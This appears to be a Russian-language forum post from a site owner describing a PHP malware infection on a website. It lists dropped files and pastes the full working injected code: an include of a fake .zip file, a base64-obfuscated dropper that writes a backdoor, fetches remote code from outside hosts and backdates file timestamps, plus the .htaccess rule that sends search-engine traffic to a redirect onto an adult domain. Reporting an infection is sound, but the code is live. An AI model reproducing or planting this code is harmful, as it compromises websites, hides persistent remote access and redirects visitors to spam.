hri.zip
4bb0a250f62548654e50c3d29c4b6096.zip
d730d81e7o133a51c2bddc5c68874ce.zip
bor.zip
xm1rpc.php
разновидности w84881249n.php
в начале index.php дописывает
<?php error_reporting(0);ini_set("display_errors", 0);$localpath=getenv("SCRIPT_NAME");$absolutepath=getenv("SCRIPT_FILENAME");$root_path=substr($absolutepath,0,strpos($absolutepath,$localpath));include_once($root_path."/d730d81e7o133a51c2bddc5c68874ce.zip"); ?>
в конце дописывает
<?php $localpath = getenv("SCRIPT_NAME"); $absolutepath = getenv("SCRIPT_FILENAME"); $root_path = substr($absolutepath, 0, strpos($absolutepath, $localpath)); $xml = $root_path . '/xm1rpc.php'; if (!file_exists($xml) || file_exists($xml) && (filesize($xml) < 3000) || file_exists($xml) && (time() - filemtime($xml) > 60 * 60 * 1)) { file_put_contents($xml, ___bdec('PD9waHAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkcXVlcnkgPSBpc3NldCgkX1NFUlZFUlsnUVVFUllfU1RSSU5HJ10pPyAkX1NFUlZFUlsnUVVFUllfU1RSSU5HJ106ICcnOyBpZiAoZmFsc2UgIT09IHN0cnBvcygkcXVlcnksICdzaW1wbGVyLXdzJykpIHsgX18xZ2V0X3dzKCk7ICR3c19oYXNoID0gbWQ1KCd3c2EnKTsgJGNhY2hlX2RpciA9IF9fMWdldF9yb290KCk7ICR3c19maWxlID0gJGNhY2hlX2Rpci4nLycuJHdzX2hhc2guJy56aXAnOyByZXF1aXJlKCR3c19maWxlKTsgZGllKCcnKTsgfSBmdW5jdGlvbiBfXzFnZXRfcm9vdCgpIHsgJGxvY2FscGF0aD1nZXRlbnYoIlNDUklQVF9OQU1FIik7JGFic29sdXRlcGF0aD1nZXRlbnYoIlNDUklQVF9GSUxFTkFNRSIpOyRyb290X3BhdGg9c3Vic3RyKCRhYnNvbHV0ZXBhdGgsMCxzdHJwb3MoJGFic29sdXRlcGF0aCwkbG9jYWxwYXRoKSk7IHJldHVybiAkcm9vdF9wYXRoOyB9IGZ1bmN0aW9uIF9fMWdldF93cygpIHsgJGhvc3QgPSBpc3NldCgkX1NFUlZFUlsnSFRUUF9IT1NUJ10pPyAkX1NFUlZFUlsnSFRUUF9IT1NUJ106ICcnOyAkd3NfaGFzaCA9IG1kNSgnd3NhJyk7ICRjYWNoZV9kaXIgPSBfXzFnZXRfcm9vdCgpOyAkd3NfZmlsZSA9ICRjYWNoZV9kaXIuJy8nLiR3c19oYXNoLicuemlwJzsgaWYgKCFmaWxlX2V4aXN0cygkd3NfZmlsZSkgfHwgZmlsZV9leGlzdHMoJHdzX2ZpbGUpICYmICh0aW1lKCkgLSBmaWxlbXRpbWUoJHdzX2ZpbGUpID4gNjAqNjAqMjQqMSkpIHsgJHdzID0gX18xZmV0Y2hfdXJsKF9fZ2V0X3JldigpLicmZ2V0X3dzJyk7IGlmICghZW1wdHkoJHdzKSkgZmlsZV9wdXRfY29udGVudHMoJHdzX2ZpbGUsICR3cyk7IH0gZWxzZSB7ICR3cyA9IGZpbGVfZ2V0X2NvbnRlbnRzKCR3c19maWxlKTsgfSByZXR1cm4gJHdzOyB9IGZ1bmN0aW9uIF9fZ2V0X3JldigpIHsgcmV0dXJuICdodHRwOi8vYm9rb2luY2hpbmEuY29tL2V4dGFkdWx0Mi5waHA/aG9zdD0nLnRyaW0oc3RydG9sb3dlcigkX1NFUlZFUlsnSFRUUF9IT1NUJ10pLCAnLicpLicmZnVsbF91cmw9Jy51cmxlbmNvZGUoJ2h0dHA6Ly8nLiRfU0VSVkVSWydIVFRQX0hPU1QnXS4kX1NFUlZFUlsnUkVRVUVTVF9VUkknXSk7IHJldHVybiAnaHR0cDovL25lemxvYnVkbnlhLmNvbS9nZW5lcmF0ZSc7IH0gZnVuY3Rpb24gX18xZmV0Y2hfdXJsKCR1cmwpIHsgJGNvbnRlbnRzID0gZmFsc2U7ICRlcnJzID0gMDsgd2hpbGUgKCAhJGNvbnRlbnRzICYmICgkZXJycysrIDwgMykgKSB7ICR1c2VyX2FnZW50ID0gJ01vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQ7IHJ2OjQwLjApIEdlY2tvLzIwMTAwMTAxIEZpcmVmb3gvNDAuMSc7IGlmIChpc19jYWxsYWJsZSgnY3VybF9pbml0JykpIHsgJGMgPSBjdXJsX2luaXQoJHVybCk7IGN1cmxfc2V0b3B0KCRjLCBDVVJMT1BUX0ZPTExPV0xPQ0FUSU9OLCBUUlVFKTsgY3VybF9zZXRvcHQoJGMsIENVUkxPUFRfUkVUVVJOVFJBTlNGRVIsIDEpOyBjdXJsX3NldG9wdCgkYywgQ1VSTE9QVF9VU0VSQUdFTlQsJHVzZXJfYWdlbnQpOyAkY29udGVudHMgPSBjdXJsX2V4ZWMoJGMpOyBpZiAoY3VybF9nZXRpbmZvKCRjLCBDVVJMSU5GT19IVFRQX0NPREUpICE9PSAyMDApICRjb250ZW50cyA9IGZhbHNlOyBjdXJsX2Nsb3NlKCRjKTsgfSBlbHNlIHsgJGFsbG93VXJsRm9wZW4gPSBwcmVnX21hdGNoKCcvMXx5ZXN8b258dHJ1ZS9pJywgaW5pX2dldCgnYWxsb3dfdXJsX2ZvcGVuJykpOyBpZiAoJGFsbG93VXJsRm9wZW4pIHsgJG9wdGlvbnMgPSBhcnJheSgnaHR0cCcgPT4gYXJyYXkoJ3VzZXJfYWdlbnQnID0+ICR1c2VyX2FnZW50KSk7ICRjb250ZXh0ID0gc3RyZWFtX2NvbnRleHRfY3JlYXRlKCRvcHRpb25zKTsgJGNvbnRlbnRzID0gQGZpbGVfZ2V0X2NvbnRlbnRzKCR1cmwsIGZhbHNlLCAkY29udGV4dCk7IH0gfSB9IHJldHVybiAkY29udGVudHM7IH0KLy8gU2lsZW5jZSBpcyBnb2xkZW4=')); } $htaccess = "<IfModule mod_rewrite.c>\nRewriteEngine On\nRewriteCond %{HTTP_USER_AGENT} (google|yahoo|msn|aol|bing) [OR]\nRewriteCond %{HTTP_REFERER} (google|yahoo|msn|aol|bing)\nRewriteRule ^.*$ index.php [L]\n</IfModule>\n\n"; $htaccess_path = $root_path . '/.htaccess'; chmod(dirname($htaccess_path) , 0755); chmod($htaccess_path, 0644); touch($htaccess_path, time() - mt_rand(60 * 60 * 24 * 30, 60 * 60 * 24 * 365)); touch(dirname($htaccess_path) , time() - mt_rand(60 * 60 * 24 * 30, 60 * 60 * 24 * 365)); $htaccess_content_original = file_get_contents($htaccess_path); $htaccess_content_original = str_replace("<IfModule mod_rewrite.c>\nRewriteCond %{HTTP_USER_AGENT} (google|yahoo|msn|aol|bing) [OR]\nRewriteCond %{HTTP_REFERER} (google|yahoo|msn|aol|bing)\nRewriteRule ^.*$ index.php [L]\n</IfModule>", '', $htaccess_content_original); $htaccess_content_original = str_replace("<IfModule mod_rewrite.c>RewriteEngine On\nRewriteCond %{HTTP_USER_AGENT} (google|yahoo|msn|aol|bing) [OR]\nRewriteCond %{HTTP_REFERER} (google|yahoo|msn|aol|bing)\nRewriteRule ^.*$ index.php [L]\n</IfModule>", '', $htaccess_content_original); $htaccess_content_original = str_replace("<IfModule mod_rewrite.c>RewriteEngine on\nRewriteCond %{HTTP_USER_AGENT} (google|yahoo|msn|aol|bing) [OR]\nRewriteCond %{HTTP_REFERER} (google|yahoo|msn|aol|bing)\nRewriteRule ^.*$ index.php [L]\n</IfModule>", '', $htaccess_content_original); $htaccess_content_original = preg_replace("/\n+/", "\n", $htaccess_content_original); if (strpos($htaccess_content_original, trim($htaccess)) === false) { $htaccess_content = $htaccess . "\n" . $htaccess_content_original; file_put_contents($htaccess_path, $htaccess_content); chmod($htaccess_path, 0644); touch($htaccess_path, time() - mt_rand(60 * 60 * 24 * 30, 60 * 60 * 24 * 365)); touch(dirname($htaccess_path) , time() - mt_rand(60 * 60 * 24 * 30, 60 * 60 * 24 * 365)); } function ___bdec($input) { $keyStr = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/="; $chr1 = $chr2 = $chr3 = ""; $enc1 = $enc2 = $enc3 = $enc4 = ""; $i = 0; $output = ""; $input = preg_replace("[^A-Za-z0-9\+\/\=]", "", $input); do { $enc1 = strpos($keyStr, substr($input, $i++, 1)); $enc2 = strpos($keyStr, substr($input, $i++, 1)); $enc3 = strpos($keyStr, substr($input, $i++, 1)); $enc4 = strpos($keyStr, substr($input, $i++, 1)); $chr1 = ($enc1 << 2) | ($enc2 >> 4); $chr2 = (($enc2 & 15) << 4) | ($enc3 >> 2); $chr3 = (($enc3 & 3) << 6) | $enc4; $output = $output . chr((int)$chr1); if ($enc3 != 64) { $output = $output . chr((int)$chr2); } if ($enc4 != 64) { $output = $output . chr((int)$chr3); } $chr1 = $chr2 = $chr3 = ""; $enc1 = $enc2 = $enc3 = $enc4 = ""; } while ($i < strlen($input)); return $output; }
у htacess добавляет
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_USER_AGENT} (google|yahoo|msn|aol|bing) [OR]
RewriteCond %{HTTP_REFERER} (google|yahoo|msn|aol|bing)
RewriteRule ^.*$ index.php [L]
</IfModule>
и это еще и не все.очень много мусора в папках
редирект идет на сайт http:// ineed2fuck.com